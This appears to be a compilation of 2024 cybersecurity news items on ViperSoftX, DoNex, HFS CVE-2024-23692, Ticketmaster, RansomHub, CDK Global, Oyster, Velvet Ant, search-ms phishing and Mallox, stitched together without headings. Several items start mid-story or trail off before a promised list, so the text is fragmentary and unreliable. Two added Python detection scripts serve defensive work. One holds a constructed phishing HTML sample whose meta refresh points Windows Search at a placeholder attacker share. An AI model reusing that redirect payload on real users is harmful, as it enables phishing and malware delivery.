Researchers have found new advancements in the ViperSoftX info-stealing malware, which was first discovered in 2020. This malware has become more sophisticated, using advanced techniques to avoid detection. One of its new methods is using the Common Language Runtime (CLR) to run PowerShell commands within AutoIt scripts, which are spread through pirated eBooks. This clever approach helps the malware to hide within normal system activities, making it harder for security software to detect.
How ViperSoftX Spreads
ViperSoftX spreads through torrent sites by pretending to be eBooks. The infection starts when users download a RAR archive that includes a hidden folder, a deceptive shortcut file that looks like a harmless PDF or eBook, and a PowerShell script. The archive also contains AutoIt.exe and AutoIt script files disguised as simple JPG image files. When a user clicks the shortcut file, it sets off a series of commands, starting with listing the contents of “zz1Cover4.jpg.” These commands are hidden within blank spaces and executed by PowerShell, performing various malicious actions.
What the Malware Does
According to researchers from Trellix, the PowerShell code performs several tasks, such as unhiding the hidden folder, calculating the total size of all disk drives, and setting up Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in. This ensures the malware remains active on infected systems. Additionally, the malware copies two files to the `%APPDATA%\Microsoft\Windows` directory, renaming them to .au3 and AutoIt3.exe.
A sneaky aspect of ViperSoftX is its use of CLR to run PowerShell within AutoIt, a tool normally trusted by security software for automating Windows tasks. This allows the malware to avoid detection. ViperSoftX also uses heavy obfuscation, including Base64 encoding and AES encryption, to hide commands in the PowerShell scripts extracted from image decoy files. This makes it difficult for researchers and analysis tools to understand what the malware does.
Additionally, ViperSoftX tries to modify the Antimalware Scan Interface (AMSI) to bypass security checks. By using existing scripts, the malware developers can focus on improving their evasion tactics.
The malware's network activity shows it tries to blend its traffic with legitimate system activity. Researchers noticed it uses deceptive hostnames, like security-microsoft[.]com, to appear more trustworthy and trick victims into thinking the traffic is from Microsoft. Analysis of a Base64-encoded User-Agent string revealed detailed system information gathered from infected systems, such as disk volume serial numbers, computer names, usernames, operating system versions, antivirus product information, and cryptocurrency details.
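The two network traits described above, an encoded User-Agent carrying host details and a lookalike hostname, can be checked for in proxy logs. This is an added example, not code from Trellix or from the page; the log lines and the decoded User-Agent content are constructed, and the field names inside it are assumed.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Decoded form of the constructed sample User-Agent (not a real capture); the fields
# mirror the kinds of data the report lists: serial, host, user, OS, AV, crypto.
_SAMPLE_UA_PLAINTEXT = "Serial=1A2B3C4D;HOST=WKS-01;USER=alice;OS=Win10 22H2;AV=Defender;BTC=none"
_SAMPLE_UA_B64 = base64.b64encode(_SAMPLE_UA_PLAINTEXT.encode()).decode()

# Constructed proxy log lines: client, method, URL, quoted User-Agent.
SAMPLE_LOG = (
    f'10.0.0.12 GET http://security-microsoft.com/api/v1/check "{_SAMPLE_UA_B64}"\n'
    '10.0.0.13 GET https://www.microsoft.com/en-us/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"\n'
    '10.0.0.14 GET https://update.microsoft.com/ "Microsoft-Delivery-Optimization/10.0"\n'
)

LOG_RE = re.compile(r'^(\S+)\s+(\S+)\s+(\S+)\s+"([^"]*)"\s*$')


def decode_base64_ua(ua: str, min_len: int = 16) -> Optional[str]:
    """Return the decoded text if the User-Agent is a Base64 blob that decodes to
    printable text, otherwise None. Real browser UAs contain spaces, slashes and
    parentheses that are outside the Base64 alphabet, so strict validation rejects them."""
    if len(ua) < min_len or len(ua) % 4 != 0:
        return None
    try:
        raw = base64.b64decode(ua, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not text or not all(ch.isprintable() for ch in text):
        return None
    return text


def is_lookalike_host(host: str, brand: str = "microsoft", legit_domain: str = "microsoft.com") -> bool:
    """True when a hostname contains the brand name but is neither the brand's real
    domain nor one of its subdomains (e.g. security-microsoft.com)."""
    host = host.lower().rstrip(".")
    if brand not in host:
        return False
    return not (host == legit_domain or host.endswith("." + legit_domain))


def scan_log(log_text: str) -> List[Dict]:
    """Walk proxy log lines and report requests whose User-Agent is an encoded
    system-information blob, noting whether the destination host is a lookalike."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, url, ua = m.groups()
        decoded = decode_base64_ua(ua)
        if decoded is None:
            continue
        host = urlsplit(url).hostname or ""
        findings.append({
            "client": client,
            "host": host,
            "lookalike_host": is_lookalike_host(host),
            "decoded_ua": decoded,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} -> {f['host']} (lookalike={f['lookalike_host']}): {f['decoded_ua']}")
```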
Researchers warn that ViperSoftX is becoming more dangerous. Its ability to perform malicious actions while avoiding traditional security measures makes it a serious threat. As ViperSoftX continues to evolve, it's essential for users to stay alert and use strong security practices to protect their systems from such advanced threats.
Experts uncovered a critical flaw in the encryption schema of the DoNex ransomware, including all variations and predecessors. Since March 2024, they've worked with law enforcement to give a decryptor to affected DoNex victims covertly.
The cryptographic vulnerability was widely discussed at Recon 2024, compelling the researchers to reveal the problem and its ramifications publicly.
Avast researchers discovered that the DoNex ransomware went through many rebrandings after its original identification as Muse in April 2022. Subsequent revisions of DoNex included a rebrand to a reported Fake LockBit 3.0 in November 2022, followed by DarkRace in May 2023, and lastly DoNex in March 2024.
Since April 2024, the team has discovered no further copies, and the ransomware group's public TOR address remained dormant, implying that DoNex's evolution and rebranding efforts may have ended.
The DoNex malware uses a complicated encryption method. During execution, the CryptGenRandom function generates an encryption key. This key creates a ChaCha20 symmetric key, which is later used to encrypt files.
Following encryption, the symmetric key is encrypted with RSA-4096 and appended to the impacted file. Files up to 1 MB are encrypted in their entirety, while larger files are encrypted in block segments. An XOR-encrypted configuration file stores the ransomware's configuration, as well as information on whitelisted extensions, files, and services to terminate.
While the researchers have not described the specific process they used to understand the decryption, more information about the same cryptographic flaw is available in files related to the Recon 2024 event lecture titled "Cryptography is hard: Breaking the DoNex ransomware." The event was hosted by Gijs Rijnders, a malware reverse engineer and cyber threat intelligence specialist of the Dutch National Police.
DoNex particularly targeted victims in the United States, Italy, and Belgium with tailored attacks. The researchers confirmed that the leaked DoNex decryptor can decrypt all forms of the DoNex ransomware, including earlier versions.
Victims of the DoNex ransomware can identify an attack based on the ransom note left by the software. Although several varieties of DoNex (Fake LockBit, DarkRace, and DoNex) create different ransom notes, they all have the same layout.
Cybersecurity researchers have identified a wave of attacks targeting outdated versions of the HTTP File Server (HFS) software from Rejetto, aiming to distribute malware and cryptocurrency mining tools. These attacks exploit a critical security flaw known as CVE-2024-23692, which allows hackers to execute arbitrary commands without needing authentication.
CVE-2024-23692 is a high-severity vulnerability discovered by security researcher Arseniy Sharoglazov. It was publicly disclosed in May this year, following a detailed technical report. The flaw is a template injection vulnerability that enables remote attackers to send specially crafted HTTP requests to execute commands on the affected systems. The vulnerability affects HFS versions up to and including 2.3m. In response, Rejetto has issued a warning to users, advising against the use of these versions due to their susceptibility to control by attackers.
Researchers at AhnLab Security Intelligence Center (ASEC) have observed multiple attacks on version 2.3m of HFS. This version remains popular among individuals, small teams, educational institutions, and developers for network file sharing. The attacks likely began after the release of Metasploit modules and proof-of-concept exploits soon after the vulnerability's disclosure.
During these attacks, hackers gather information about the compromised system, install backdoors, and deploy various types of malware. Commands such as "whoami" and "arp" are executed to collect system and user information and identify connected devices. Hackers also add new users to the administrators' group and terminate the HFS process to prevent other threat actors from exploiting the same vulnerability.
In several cases, the XMRig tool, used for mining Monero cryptocurrency, was installed. ASEC researchers attribute one of these attacks to the LemonDuck threat group. Other malware payloads deployed include:
1. XenoRAT: A tool for remote access and control, often used alongside XMRig.
2. Gh0stRAT: Used for remote control and data exfiltration.
3. PlugX: A backdoor associated with Chinese-speaking threat actors, providing persistent access.
4. GoThief: An information stealer that uses Amazon AWS for data exfiltration, capturing screenshots, collecting desktop file information, and sending data to an external command and control server.
AhnLab continues to detect attacks on HFS version 2.3m. Given that the server must be online for file sharing, it remains a lucrative target for hackers. Rejetto recommends users switch to version 0.52.x, which is the latest release despite its lower version number. This version is web-based, requires minimal configuration, and supports HTTPS, dynamic DNS, and administrative panel authentication.
The company has also provided indicators of compromise, including malware hashes, IP addresses of command and control servers, and download URLs for the malware used in these attacks. Users are urged to update their software to the latest version and follow cybersecurity best practices to protect their systems from such vulnerabilities.
By understanding and addressing these vulnerabilities, users can better secure their systems against these sophisticated attacks.
The breach, initially believed to be limited in scope, has now escalated, affecting millions of ticket holders, including fans attending Taylor Swift’s Eras Tour. Let’s delve into the details of this high-stakes cybercrime.
In an email sent to affected customers, Ticketmaster said that they had discovered "unauthorised activity" in a third-party cloud database, and that personal data of "some customers" who purchased tickets to events in North America (the United States, Canada, and/or Mexico) could have been compromised.
Ticketmaster confirmed that unauthorized access occurred, leading to the compromise of sensitive customer data. The hackers gained access to 193 million ticket barcodes, valued at an astonishing $22.6 billion. Among these, 440,000 tickets belong to Taylor Swift’s ongoing tour, leaving fans anxious and concerned.
ShinyHunters, known for their audacity, demanded an $8 million ransom for the safe return of the stolen data. The group threatened to leak the ticket barcodes if their demands were not met promptly. Ticketmaster faced a dilemma: pay the ransom or risk exposing millions of customers’ personal information.
The American Ticket Sales and Distribution Company shared, "Ticketmaster’s SafeTix technology protects tickets by automatically refreshing a new and unique barcode every few seconds so it cannot be stolen or copied. This is just one of many fraud protections we implement to keep tickets safe and secure."
"Some outlets are inaccurately reporting about a ransom offer. We were never engaged for a ransom and did not offer them money," Ticketmaster confirmed.
Customers trust platforms like Ticketmaster with their personal details, including names, addresses, and payment information. The breach jeopardizes this trust and raises questions about data security practices within the industry.
Ticketmaster faces a double bind: pay the ransom and potentially encourage further attacks, or refuse and risk public outrage. The financial implications extend beyond the ransom amount. Legal fees, compensation to affected customers, and damage control efforts will strain the company’s resources.
Ticketmaster’s reputation hangs in the balance. Swift action is crucial to mitigate reputational harm. Customers may think twice before purchasing tickets through the platform, affecting future sales and partnerships.
Cloud Europe is a Tier IV carrier-neutral data center based in Rome's Tecnopolo Tiburtino. According to the company's website, it specializes in data center architecture and management, focusing on security and service continuity. The company creates, hosts, and operates modular infrastructure for data centers in both the private and public sectors.
1. Cloud Europe: On June 29, 2024, RansomHub claimed responsibility for infiltrating the servers of Cloud Europe, a prominent Tier IV certified data center in Rome. The attackers allegedly encrypted the servers and exfiltrated 70 terabytes of data. Among the stolen information were 541.41 gigabytes of sensitive data, including client records, financial documents, and proprietary software.
2. Mangimi Fusco: The same day, RansomHub targeted Mangimi Fusco, an animal food manufacturer. The group claimed to have stolen 490 gigabytes of confidential data, including client files, budget details, and payroll information. However, as of now, Mangimi Fusco’s website shows no signs of the reported attack, leaving room for skepticism.
3. Francesco Parisi: RansomHouse, another hacking collective, breached the website of Francesco Parisi, a group specializing in freight forwarding and shipping services. The attack occurred on May 29, 2024, and resulted in the theft of 150 gigabytes of company data. Francesco Parisi has acknowledged the breach and is working to restore normalcy while enhancing its cybersecurity defenses.
These attacks raise critical questions about the state of cybersecurity readiness among Italian businesses:
Vulnerabilities: Despite advancements in security protocols, organizations remain vulnerable to sophisticated attacks. The ability of threat actors to infiltrate well-established data centers and corporate websites highlights the need for continuous vigilance.
Data Privacy: The stolen data contains sensitive information that could be exploited for financial gain or used maliciously. Companies must prioritize data privacy and invest in robust encryption, access controls, and incident response plans.
Business Continuity: When ransomware strikes, business operations grind to a halt. Cloud Europe’s experience serves as a stark reminder that even data centers, designed to ensure continuity, are not immune. Organizations must have contingency plans to minimize disruptions.
To safeguard against ransomware and other cyber threats, companies should consider the following strategies:
The automotive industry has faced an unprecedented challenge: a cyberattack targeting CDK Global, a major software provider for auto dealerships. This incident has sent shockwaves through the industry, affecting dealerships across the United States. In this blog post, we’ll delve into the details of the attack, its consequences, and the lessons we can learn from it.
CDK Global, a company that provides software solutions to auto dealers, fell victim to a ransomware attack. The attack was orchestrated by a group known as BlackSuit, which demanded a hefty ransom from CDK. As a precautionary measure, CDK temporarily shut down most of its systems to prevent further damage and protect its customers.
Several major auto dealership groups reported disruptions:
Lithia Motors: Lithia Motors, one of the largest dealership networks in the U.S., faced operational challenges due to the CDK cyberattack. Their day-to-day processes, including inventory management and customer interactions, were affected.
Group 1 Automotive: Group 1 Automotive, another prominent player in the industry, experienced delays in vehicle sales and service. The attack disrupted their ability to process transactions efficiently.
Penske Automotive Group: Penske, a well-known name in auto retail, struggled with system outages. Their sales teams couldn’t access critical information, impacting customer service.
Sonic Automotive: Sonic Automotive’s dealerships grappled with inventory discrepancies. The attack disrupted their supply chain management, leading to delays in vehicle deliveries.
Asbury Automotive Group: Asbury Automotive Group faced challenges in communicating with customers. Their CRM systems were offline, affecting follow-ups and lead management.
AutoNation: AutoNation, a nationwide dealership network, had to adapt quickly. The attack disrupted their online sales platforms, affecting customer inquiries and transactions.
The CDK incident underscores the importance of robust cybersecurity measures. Dealerships must invest in secure infrastructure, regular vulnerability assessments, and employee training. Cyber hygiene is crucial to prevent and mitigate attacks.
Having a well-defined incident response plan is essential. Dealerships should know how to react swiftly when faced with a cyber threat. Regular drills and simulations can help teams prepare for such scenarios.
Dealerships rely on third-party vendors like CDK for critical services. Assessing vendor security practices and ensuring contractual obligations related to cybersecurity are met is vital. Regular audits can help identify vulnerabilities.
According to people familiar with the situation, the BlackSuit ransomware gang is responsible for CDK Global's significant IT failure and interruption to car dealerships throughout North America.
The conversations follow the BlackSuit ransomware assault, which led CDK to lock down its IT infrastructure and data centers, including its car dealership platform, to prevent the attack from spreading. The company attempted to restore services on Wednesday, but a second cybersecurity attack forced it to shut down all IT systems again.
CDK Global, a leading provider of technology solutions for auto dealerships, found itself in the crosshairs of cybercriminals.
While the company has yet to officially confirm the ransomware attack, multiple sources indicate that BlackSuit is behind the incident. The attack likely exploited vulnerabilities in CDK’s systems, leading to widespread disruption.
The fallout from the CDK Global outage has been substantial. Car dealerships rely heavily on CDK’s software for inventory management, sales, and customer service.
With the systems down, dealers have had to resort to manual processes, including pen-and-paper record-keeping. Imagine the chaos in a busy dealership trying to manage sales, service appointments, and parts inventory without their usual digital tools.
Beyond the immediate operational challenges, there are serious concerns about data theft. Ransomware attacks often involve stealing sensitive information before encrypting files and demanding a ransom.
CDK Global must now investigate whether customer data, financial records, or other critical information has been compromised. The potential fallout from such a breach could be long-lasting and damaging.
CDK Global’s response to the attack is crucial. They need to assess the extent of the breach, restore systems, and enhance security measures. Communication with affected dealerships is equally important. Dealers need transparency about the situation, timelines for resolution, and guidance on how to navigate the outage.
According to Steve Stone, president of Rubrik's Zero Labs, ransomware is one of the levers changing how enterprises think about risk. Zero Labs' latest analysis shows that healthcare firms are more likely to lose 20% of their sensitive data after a ransomware attack.
This blog post will explore why healthcare organizations are at risk and discuss strategies to mitigate these threats.
Healthcare organizations handle vast amounts of sensitive data, including patient records, medical histories, and financial information. This data is a goldmine for cybercriminals seeking economic gain. According to recent reports, healthcare data breaches cost organizations an average of $7.13 million per incident. The sheer volume of sensitive data makes healthcare an attractive target.
While ransomware operators don’t exclusively focus on healthcare, the industry shares architectural nuances with other sectors. For instance:
Legacy Systems: Many healthcare institutions still rely on legacy systems that lack robust security features. These outdated systems are more susceptible to attacks.
Interconnected Networks: Healthcare networks connect various entities—hospitals, clinics, laboratories, and insurance providers. This interconnectedness creates multiple entry points for attackers.
Medical Devices: Internet of Things (IoT) devices, such as MRI machines and infusion pumps, are integral to patient care. However, they often lack proper security controls, making them vulnerable.
Preventing ransomware starts with understanding your risk surface area. Here’s how healthcare organizations can reduce their exposure:
Identity Management: Properly managing user identities and access rights is crucial. Limiting access to sensitive data based on roles and responsibilities helps prevent unauthorized changes.
Data Visibility: Organizations must know where sensitive data resides, both on-premises and in the cloud. Regular audits and data classification are essential.
Backup and Recovery: Robust backup solutions are critical. Regularly backing up data ensures that even if ransomware strikes, organizations can restore systems without paying the ransom.
Healthcare organizations face unique challenges in incident response:
Hybrid Environments: Many healthcare systems operate in hybrid environments—partly on-premises and partly in the cloud. Coordinating incident response across these environments can be complex.
Patient Safety: Ransomware attacks can disrupt critical services, affecting patient care. Balancing data protection with patient safety is a delicate task.
Collaboration: Effective incident response requires collaboration among IT teams, legal departments, and external cybersecurity experts.
“Rapid7 observed that the websites were masquerading as Microsoft Teams websites, enticing users into believing they were downloading legitimate software when, in reality, they were downloading the threat actor’s malicious software,” said the report.
The modus operandi of this campaign involves luring users to malicious websites. The threat actors create typo-squatted sites that closely mimic legitimate platforms. For instance, users searching for Microsoft Teams might inadvertently land on a fake Microsoft Teams download page. These malicious websites host supposed software installers, enticing users to download and install the application.
However, the catch lies in the content of these fake installers. When users download them, they unknowingly execute the Oyster backdoor. This stealthy piece of malware allows attackers to gain unauthorized access to compromised systems.
Once the backdoor is in place, attackers can engage in hands-on keyboard activity, directly interacting with the compromised system. Furthermore, the Oyster backdoor can deploy additional payloads after execution, potentially leading to further compromise or data exfiltration.
The impact on users who fall victim to this malvertising campaign can be severe. They inadvertently install the Oyster backdoor on their systems, providing attackers with a foothold. From there, attackers can escalate privileges, steal sensitive information, or launch other attacks.
To reduce such risks, users should remain vigilant:
According to a Sygnia report, which discovered the breach after being called in to investigate the cyberattack, Velvet Ant established multiple footholds across the network, including a legacy F5 BIG-IP appliance that served as an internal command and control (C2) server.
The ‘Velvet Ant’ group, suspected to have ties to Chinese state-sponsored actors, has been active since at least 2017. Their primary focus is on cyber espionage, targeting government entities, defense contractors, and critical infrastructure organizations. Their modus operandi involves gaining persistent access to internal networks, exfiltrating sensitive data, and maintaining long-term presence without detection.
F5 BIG-IP appliances are widely used for load balancing, application delivery, and security functions. Unfortunately, their ubiquity also makes them an attractive target for threat actors. The ‘Velvet Ant’ group leverages vulnerabilities in these devices to achieve their objectives.
The Windows Search protocol is a Uniform Resource Identifier (URI) that allows applications to open Windows Explorer and perform searches with specific parameters. Typically, these searches are conducted on the local device’s index. However, attackers have discovered that it’s possible to manipulate Windows Search to query file shares on remote hosts, presenting these remote files as if they were local.
The recent phishing attacks, as detailed in a report by Trustwave SpiderLabs, start with a seemingly innocuous email. The email contains an HTML attachment disguised as an invoice document within a ZIP archive. This ZIP file format helps evade many security and antivirus scanners that might not inspect the contents thoroughly.
Upon opening the HTML file, it uses a `<meta http-equiv="refresh">` tag to automatically redirect the browser to a malicious URL. A clickable anchor tag provides a fallback mechanism if the automatic redirect fails due to browser settings or other reasons. This URL exploits the Windows Search protocol to perform a search on a remote host.
The search parameters in this phishing attack are ingeniously crafted to mislead users. The query searches for items labeled "INVOICE," while the crumb parameter sets the search scope, directing it to a malicious server through Cloudflare. The display name is altered to "Downloads," giving the appearance of a legitimate interface. Additionally, Cloudflare's tunnelling service masks the server, making the remote resources appear as though they are local files.
The search results display a single shortcut (LNK) file named as an invoice. When the victim clicks on this file, it triggers a batch script (BAT) hosted on the same remote server.
The exact operations of the batch script remain unknown, as Trustwave researchers could not analyse it due to the server being offline at the time of their investigation. However, the potential for harmful activities, such as data theft or system compromise, is significant.
To defend against this threat, Trustwave suggests removing registry entries associated with the search-ms/search URI protocol. This can be done by executing specific commands in the registry editor. However, this action should be taken cautiously as it may disrupt legitimate applications and Windows features that rely on this protocol.
This new phishing method highlights the twisted tactics of cybercriminals and the importance of staying vigilant. Users and organisations must be aware of such threats and implement robust security measures to protect against these sophisticated attacks. Regular updates to security protocols and awareness training can help mitigate the risks posed by these kinds of phishing campaigns.
A new and intricate malware campaign has been discovered by Trustwave SpiderLabs, leveraging the Windows search feature embedded in HTML code to spread malicious software. The attack begins with a phishing email containing an HTML attachment disguised as a routine document, such as an invoice. To deceive users and evade email security scanners, the HTML file is compressed within a ZIP archive. This extra layer of obfuscation reduces the file size for quicker transmission, avoids detection by some email scanners, and adds a step for users, potentially bypassing simpler security measures. Notably, this campaign has been observed in limited instances.
HTML Attachment Mechanics
Once the HTML attachment is opened, it triggers a complex attack by abusing standard web protocols to exploit Windows system functionalities. A critical component of the HTML code is the `<meta http-equiv="refresh">` tag, which automatically reloads the page and redirects to a new URL with zero delay, making the redirection instant and unnoticed by the user. Additionally, an anchor tag serves as a fallback mechanism, ensuring the user is still at risk even if the automatic redirect fails.
Exploitation of the Search Protocol
When the HTML file loads, browsers typically prompt users to allow the search action as a security measure. The redirection URL uses the `search:` protocol, allowing applications to interact directly with Windows Explorer's search function. The attackers exploit this protocol to open Windows Explorer and perform a search with parameters they crafted. These parameters direct the search to look for items labelled as "INVOICE," control the search scope to a specific directory, rename the search display to "Downloads" to appear legitimate, and hide their malicious operations using Cloudflare’s tunnelling service.
Execution of Malicious Files
After the user permits the search action, Windows Explorer retrieves files named "invoice" from a remote server. Only one item, a shortcut (LNK) file, appears in the search results. This LNK file points to a batch script (BAT) hosted on the same server. If the user clicks the file, it could trigger additional malicious operations. At the time of analysis, the payload (BAT) could not be retrieved as the server was down, but the attack demonstrates a sophisticated understanding of exploiting system vulnerabilities and user behaviour.
To prevent exploitation of the `search-ms` and `search` URI protocols, one mitigation strategy is to disable these handlers by deleting the associated registry entries. This can be achieved using specific commands.
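Both Trustwave write-ups above describe the same attachment shape: a zero-delay meta refresh and a fallback anchor that hand off to a `search-ms:`/`search:` URI whose `crumb` points at a remote location and whose `displayname` is set to "Downloads". A mail gateway or triage script can flag that shape before a user ever sees the prompt. This is an added example, not Trustwave's MailMarshal logic or any code from the page; the HTML sample is constructed and the share host is a placeholder.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Constructed attachment body with the shape the reports describe; the share host
# is a placeholder, not a real indicator. Backslashes are percent-encoded (%5C).
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=search-ms:query=INVOICE&crumb=location:%5C%5Cfiles.attacker-placeholder.invalid%5Cshare&displayname=Downloads">
</head><body>
<p>Your invoice is attached.</p>
<a href="search-ms:query=INVOICE&crumb=location:%5C%5Cfiles.attacker-placeholder.invalid%5Cshare&displayname=Downloads">Open invoice</a>
</body></html>"""

SEARCH_SCHEMES = ("search-ms", "search")
# "<delay>; url=<target>" as used in meta refresh content attributes.
REFRESH_RE = re.compile(r"^\s*(\d+)\s*;\s*url\s*=\s*(.+?)\s*$", re.IGNORECASE)
# A crumb location is remote if it is a UNC path (\\host\share) or carries a URL scheme.
REMOTE_LOCATION_RE = re.compile(r"^(\\\\|[a-z][a-z0-9+.-]*://)", re.IGNORECASE)


class SearchUriFinder(HTMLParser):
    """Collect every URL the document could navigate to: meta-refresh targets and anchor hrefs."""

    def __init__(self) -> None:
        super().__init__()
        self.candidates: List[tuple] = []  # (source, delay_or_None, url)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_RE.match(a.get("content", ""))
            if m:
                self.candidates.append(("meta-refresh", int(m.group(1)), m.group(2).strip("'\"")))
        elif tag == "a" and a.get("href"):
            self.candidates.append(("anchor", None, a["href"]))


def analyze_search_uri(url: str) -> Optional[Dict]:
    """Return the decoded search parameters if the URL uses a Windows Search scheme, else None.
    The parameters sit after the scheme colon (no '?'), so they are parsed from that remainder."""
    scheme, sep, rest = url.partition(":")
    if not sep or scheme.lower() not in SEARCH_SCHEMES:
        return None
    params = {k.lower(): v[0] for k, v in parse_qs(rest, keep_blank_values=True).items()}
    crumb = params.get("crumb", "")
    location = crumb.split(":", 1)[1] if crumb.lower().startswith("location:") else ""
    return {
        "scheme": scheme.lower(),
        "query": params.get("query", ""),
        "displayname": params.get("displayname", ""),
        "location": location,
        "remote": bool(REMOTE_LOCATION_RE.match(location)),
    }


def scan_html(html: str) -> List[Dict]:
    """Report each navigation target in the HTML that would hand off to Windows Search,
    with the delay (0 means instant redirect) and whether the scope is a remote location."""
    finder = SearchUriFinder()
    finder.feed(html)
    findings = []
    for source, delay, url in finder.candidates:
        info = analyze_search_uri(url)
        if info is None:
            continue
        findings.append({"source": source, "delay": delay, **info})
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"{f['source']}: scheme={f['scheme']} query={f['query']!r} "
              f"displayname={f['displayname']!r} remote={f['remote']} location={f['location']!r}")
```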
This attack highlights the importance of user awareness and proactive security strategies. While it does not involve automated malware installation, it requires users to engage with various prompts and clicks, cleverly obscuring the attackers' true intent. As the threat landscape becomes more complex, continuous education and robust security measures are vital to protect against such deceptive tactics.
Trustwave SpiderLabs has updated its MailMarshal software to detect and block HTML files that abuse the search URI handler, offering additional protection for users.
The Mallox ransomware organization is targeting VMware ESXi setups with a new Linux strain that uses a novel mechanism to transmit and execute its payload only on workstations with high-level user capabilities.
The variant, discovered by Trend Micro researchers who monitor Mallox as TargetCompany, specifically determines whether a targeted system is running in a VMware ESXi environment and has administrative rights, and will not launch an attack if these conditions are not met.
Mallox, also known as Fargo and Tohnichi, first appeared in June 2021 and claims to have infected hundreds of organizations worldwide. The group's targeted sectors include manufacturing, retail, wholesale, legal, and professional services. According to Trend Micro, the most active Mallox sites this year are in Taiwan, India, Thailand, and South Korea.
The Linux variation is the first time Mallox has been seen employing a customized shell script to deliver and execute ransomware on virtualized environments, indicating that the activity was likely intended to cause more disruption and, as a result, increase the chances of a ransom payment.
Also, the adversary responsible for wielding the variant is a Mallox affiliate known as "vampire," implying the group's involvement in "broader campaigns involving high ransom demands and expansive IT system targeting," Trend Micro's Darrel Tristan Virtusio, Nathaniel Morales, and Cj Arsley Mateo wrote in the post.
The usage of a customized shell also suggests that Mallox "has been continuously evolving to employ more sophisticated methods in its future attacks," the researchers wrote.
This freshly discovered Linux variant is consistent with the recent trend of ransomware gangs expanding their attacks to important Linux environments, potentially increasing the number of target victims.
In addition to delivery and execution, the custom shell script sends the victim's information to two additional servers, allowing the ransomware perpetrators to have a backup. Mallox is reported to have used a leak site with the same name to reveal data obtained during ransomware assaults.
This current variant first examines a system to verify if the executable is executing with administrative privileges; if not, it will not continue its operation.
Following execution, the variation creates a text file named TargetInfo.txt that contains victim information and sends it to a command-and-control (C2) server, similar to the Windows version of Mallox ransomware.
The IP address used to steal this information and later execute the payload was not previously used by Mallox. According to the researchers, it is hosted by China Mobile Communications, a Chinese ISP, and was most likely hired by the threat actor for a brief period to host its malicious payload.
The program also checks to see if the system name matches "vmkernel," indicating that the machine is running VMware's ESXi hypervisor. If that's the case, it uses its encryption process, attaching the ".locked" extension to encrypted files and dropping a ransom letter called HOW TO DECRYPT.txt. The researchers found that both the extension and the note deviate from the Windows variant.
The custom shell script used to download and execute the payload can also exfiltrate data to another server. When the ransomware completes its routine, it reads the contents of the dropped text file and uploads it to another URL.
The variation also exports victim information to two distinct sites, possibly "to improve redundancy and have a backup in case a server goes offline or is compromised," the researchers stated.
After the ransomware completes its routine, the script deletes the TargetCompany payload, making it even more difficult for security to determine the full impact of the attack, complicating investigation and incident response.
Mallox's clever expansion of its assault activities into Linux platforms running VMware ESXi necessitates more vigilance on the part of enterprises fitting this description, according to the researchers.
The researchers proposed that enterprises implement multifactor authentication (MFA) to prevent attackers from executing lateral movement within a network.